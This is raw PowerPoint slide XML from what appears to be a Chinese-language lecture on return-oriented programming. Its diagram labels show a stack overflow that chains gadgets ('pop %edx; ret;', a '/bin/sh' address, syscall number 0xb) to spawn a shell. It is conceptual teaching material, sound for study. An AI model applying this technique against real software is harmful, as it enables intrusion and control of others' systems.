                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>rogramming</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华文隶书" panose="02010800040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文隶书" panose="02010800040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>返回导向编程</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0">
              <a:latin typeface="华文隶书" panose="02010800040101010101" pitchFamily="2" charset="-122"/>
              <a:ea typeface="华文隶书" panose="02010800040101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Shape 817">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EBB5AD43-7E1E-440B-845D-C88AE4C56A57}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5289463"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E34DED4-AB12-4048-9CBD-9F44C9BEBFD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394641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E41E75-CADB-432F-BD9B-68BB2E8535DF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="812800" y="30118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9B83B2B-3040-4AB1-B910-66DF6FEBA992}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="812800" y="34055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71B465-21BE-4265-88CF-A20EC117EDD0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="812800" y="37992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330787A-EBE9-44B1-97D1-4C5D4F13ACFD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="812800" y="41929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return address</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="矩形 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4403F34D-524A-4A67-8521-81C875F32659}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="812800" y="4586684"/>
            <a:ext cx="2670924" cy="1934766"/>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E5396C4-F8ED-4107-8266-1D7885A48E45}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4824038" y="30118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“/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>” address</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="矩形 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{18C964E2-877C-4132-AC90-E433E02ACBDF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4824038" y="34055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r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> address</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="矩形 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F61C535F-6CFE-419B-962B-C2F3BE7C4AAC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4824038" y="37992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0xb</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="矩形 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D32B999C-9F1D-4536-89E3-972E122065E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4824038" y="41929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r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> address</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="矩形 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{951CE4C9-BF9B-45DC-A8C8-33956207818B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4824038" y="5251450"/>
            <a:ext cx="2670924" cy="12700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70F0A0F-B047-4E18-9915-B81F19176B9A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4824038" y="4586684"/>
            <a:ext cx="2670924" cy="664766"/>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38D9AEA-7B47-4C55-9E79-841CCFBE114B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4824038" y="14370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4" name="矩形 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F2FC757D-D5C8-473A-9481-BF108561E891}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4824038" y="18307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r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> address</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="矩形 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1083524A-D152-4F5E-A4D8-6590B39A3A9C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4824038" y="22244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6" name="矩形 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2B42E4E0-76B9-4E7A-A906-A30E05757E19}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4824038" y="26181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r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> address</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="矩形 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A5FD54C4-F70B-46A2-B829-B7FAB211D4EE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4824038" y="1060052"/>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 address</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="矩形 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E7DB867C-BE74-4C78-BB72-82B45E1EAF44}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="812800" y="22244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2AE09F7-22CB-4AA1-B90D-824764AC9142}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="812800" y="26181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9AF2669-61B0-465A-A8DA-237F6BD6AF27}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="812800" y="14603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F55AA98-18FD-470D-A22F-DBC4BA0A7711}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="812800" y="18540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CBCADDE8-1B74-4FFF-92DE-6D1F9CB8F979}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="812800" y="1070768"/>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B55803E-EB92-4F4B-8A2F-43590F0EA416}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8835276" y="1373584"/>
            <a:ext cx="2670924" cy="4851400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="C8E6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40" name="箭头: 右 39">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{90682E4E-3467-48F3-A7A8-633024F0800E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3483724" y="3710360"/>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栈溢出</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="41" name="箭头: 右 40">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{51724AA6-13F5-4EC1-ADC2-B14D7585C1B7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7494962" y="3725068"/>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跳转执行</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8875318D-7877-4C4D-AAD2-6303D8558187}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1786624" y="720486"/>
            <a:ext cx="723275" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>stack</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="42" name="文本框 41">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1849A34A-5F8A-42C6-9DDA-B515B19AC645}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5734362" y="660747"/>
            <a:ext cx="723275" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>stack</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="43" name="文本框 42">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A35BA6B5-2F3A-45D2-BEB1-FDBDBF25DD16}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9892456" y="660747"/>
            <a:ext cx="556563" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>text</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="45" name="矩形 44">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3F794532-DA8C-4977-9DEA-1154F955B8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30926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34" name="左大括号 33">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B5F22289-FEBC-4F5F-A9F5-2EF24E38A672}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8397025" y="2059185"/>
            <a:ext cx="438251" cy="3888582"/>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2CB9E60-2E15-4303-B6CD-D48307518706}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6916853" y="3772643"/>
            <a:ext cx="1204176" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>gadget</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="43" name="Shape 1693">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{402B94DC-0704-487A-96A3-E8DB0FE10DCB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2364054" y="1592386"/>
            <a:ext cx="2157871" cy="1222648"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="44" name="Shape 1694">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FA033AE0-987B-4ADF-A392-E99338C61B5B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2364054" y="4008969"/>
            <a:ext cx="1924776" cy="1938798"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="45" name="Shape 1695">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{05E21548-7103-4F84-831B-A23C0DBB64FF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="3180277" y="3454314"/>
            <a:ext cx="488877" cy="43825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Shape 1696">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{413AF540-8566-4141-A053-1B4AE2BBC78E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2364054" y="2814686"/>
            <a:ext cx="2291759"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gadget</a:t>
            </a:r>
            <a:endParaRPr sz="2400" b="1" kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47" name="Shape 1697">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B1568187-FA61-4DA5-9C5E-007C32EA5835}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2383305" y="5977099"/>
            <a:ext cx="2157871"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p</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2400" b="1" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>ayload</a:t>
            </a:r>
            <a:endParaRPr sz="2400" b="1" kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="矩形 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{94200275-886D-46C4-B617-F6999460165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4162275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90" name="Shape 1590"/>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0x08052318</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1591" name="Shape 1591"/>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0x0c0c0c0c</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1592" name="Shape 1592"/>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593" name="Shape 1593"/>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594" name="Shape 1594"/>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pop %edx; ret;</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1595" name="Shape 1595"/>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596" name="Shape 1596"/>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597" name="Shape 1597"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7162473" y="4389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598" name="Shape 1598"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8059740" y="4593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599" name="Shape 1599"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2744967" y="55639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stack overflow; ret;</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1600" name="Shape 1600"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1599" idx="0"/>
            <a:endCxn id="1594"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01" name="Shape 1601"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1594" idx="0"/>
            <a:endCxn id="1595"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02" name="Shape 1602"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1595" idx="0"/>
            <a:endCxn id="1596"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03" name="Shape 1603"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1590" idx="1"/>
            <a:endCxn id="1594"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04" name="Shape 1604"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1592" idx="1"/>
            <a:endCxn id="1595"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05" name="Shape 1605"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1593" idx="1"/>
            <a:endCxn id="1596"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06" name="Shape 1606"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1320807" y="4778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EIP</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1607" name="Shape 1607"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2218073" y="4983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08" name="Shape 1608"/>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0x41414141</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="矩形 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{03406D20-12E8-432C-ADDF-6E3AC5DECF0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3" name="Shape 1589">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
